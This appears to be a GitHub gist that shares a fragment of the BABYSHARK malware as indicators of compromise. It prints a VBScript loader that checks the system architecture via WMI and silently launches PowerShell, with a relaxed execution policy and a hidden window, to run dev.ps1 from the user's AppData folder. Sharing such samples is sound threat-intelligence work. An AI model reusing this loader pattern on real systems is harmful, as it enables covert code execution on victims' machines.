Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created February 23, 2022 18:59
Embed
What would you like to do?
BABYSHARK malware indicators of compromise
On Error Resume Next
Set wShell=CreateObject("WScript.Shell")
ix=0
Set objWMI = GetObject("winmgmts:\\.\root\CIMV2")
Set coll = objWMI.ExecQuery("SELECT * FROM Win32_ComputerSystem")
For Each obj In coll
ix=InStr(1, obj.systemtype, "X86")
Exit For
Next
Set wShell=CreateObject("WScript.Shell")
retu=wShell.run("powershell cd $env:appdata ;powershell -executionpolicy remotesigned -file ""./Microsoft/dev.ps1""",0,false)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment